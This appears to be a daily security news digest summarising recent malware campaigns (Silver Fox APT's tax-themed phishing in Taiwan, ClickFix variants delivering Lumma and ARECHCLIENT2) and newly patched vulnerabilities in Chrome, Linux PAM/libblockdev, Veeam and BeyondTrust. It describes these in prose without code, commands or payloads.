An official-looking email from the tax department may be anything but. Silver Fox APT is targeting Taiwanese users with phishing emails posing as the National Taxation Bureau, delivering malware like Winos 4.0, HoldingHands RAT, and Gh0stCringe. The attack chain uses DLL side-loading, privilege escalation, and anti-analysis techniques to evade detection and maintain access through remote desktop and file management modules.

One compromised travel site is now a launchpad for infostealer infections. A new ClickFix variant, LightPerlGirl, is using fake Cloudflare CAPTCHA prompts and clipboard hijacking to deliver the Lumma infostealer. By exploiting PowerShell and personal device access, the malware could lead to broader breaches across enterprise environments.

A pair of Linux vulnerabilities could give attackers root in seconds. CVE-2025-6018 and CVE-2025-6019 impact multiple major Linux distributions, enabling local users to escalate privileges via flaws in PAM and libblockdev. If chained together, the bugs allow full system compromise with minimal friction, posing a serious risk if left unpatched.

Top Malware Reported in the Last 24 Hours

ClickFix campaign drops RATs and infostealer

A rise in cyber campaigns is utilizing the ClickFix social engineering technique to deploy malware, particularly the GHOSTPULSE loader and ARECHCLIENT2 infostealer. ClickFix manipulates users into executing malicious PowerShell commands by disguising them as benign prompts, often appearing as CAPTCHA verifications. The GHOSTPULSE loader, continuously updated, employs multi-stage payload delivery and DLL sideloading techniques to enhance evasion. ARECHCLIENT2, a .NET-based remote access trojan, targets sensitive information such as credentials and financial data. The attack chain begins with phishing pages that deliver obfuscated scripts, leading to the execution of malware. The infrastructure behind these campaigns leverages compromised servers, with C2 nodes frequently changing to evade detection.

Hackers target Taiwan, drop Winos 4.0

Silver Fox APT launched a phishing campaign targeting Taiwan, which impersonates the National Taxation Bureau to distribute malware, including Winos 4.0, HoldingHands RAT, and Gh0stCringe. Emails use topics like tax forms and invoices, embedding malicious links or files leading to malware downloads. The attack employs multi-stage side-loading methods with files like TaskServer.exe and Dokan2.dll, which decrypt and execute malicious payloads. The malware utilizes anti-virtualization techniques, privilege escalation, and evasion strategies against security tools like Kaspersky. HoldingHands RAT communicates with C2 servers, collecting system data and supporting remote operations through modules like Remote Desktop and File Manager.

Researchers identify new ClickFix variant

A new ClickFix malware variant, LightPerlGirl, was discovered exploiting PowerShell and clipboard hijacking to deliver the Lumma infostealer. The malware uses a compromised WordPress travel site in a watering hole attack, tricking users with fake Cloudflare CAPTCHA prompts. The attack process involves clipboard manipulation, obfuscated PowerShell commands, and connection to a C2 domain for malware delivery. The Lumma infostealer could lead to broader enterprise compromises by targeting individuals' personal devices. 

Top Vulnerabilities Reported in the Last 24 Hours

Google released Chrome 137

Google's Chrome 137 update addresses three vulnerabilities, including two high-severity memory bugs: CVE-2025-6191, an integer overflow in the V8 JavaScript engine, and CVE-2025-6192, a use-after-free flaw in the Profiler component. The patches are available for Windows, macOS, and Linux. Memory vulnerabilities are appealing targets for attackers, and recent incidents have seen such flaws exploited as zero-days. Notably, CVE-2025-2783, a sandbox escape vulnerability, was exploited in cyberespionage campaigns against Russian organizations, linked to a group called Team46, which employs sophisticated malware and zero-day exploits.

Two LPE bugs in Linux distributions

Two local privilege escalation (LPE) vulnerabilities (CVE-2025-6018 and CVE-2025-6019) allow attackers to gain root access on major Linux distributions like Ubuntu, Debian, Fedora, and SUSE systems. CVE-2025-6018 involves a flaw in the PAM framework configuration on SUSE systems, enabling attackers to escalate privileges to "allow_active" users. CVE-2025-6019 is a vulnerability in libblockdev that allows "allow_active" users to gain root permissions via the udisks daemon, which is present by default on most Linux distributions. These vulnerabilities can be chained for quick root access and complete system takeover with minimal effort. Root access from these flaws could lead to agent tampering, persistence, and lateral movement, endangering entire networks if unpatched.

Veeam and BeyondTrust patch multiple bugs

Veeam and BeyondTrust released patches for vulnerabilities that could enable remote code execution. BeyondTrust addressed a server-side template injection flaw (CVE-2025-5309) in RS and PRA products, impacting specific versions. Veeam patched critical and high-severity vulnerabilities in its Backup & Replication software, including CVE-2025-23121 and CVE-2025-24286. A medium-severity vulnerability in Veeam Agent for Microsoft Windows was also fixed.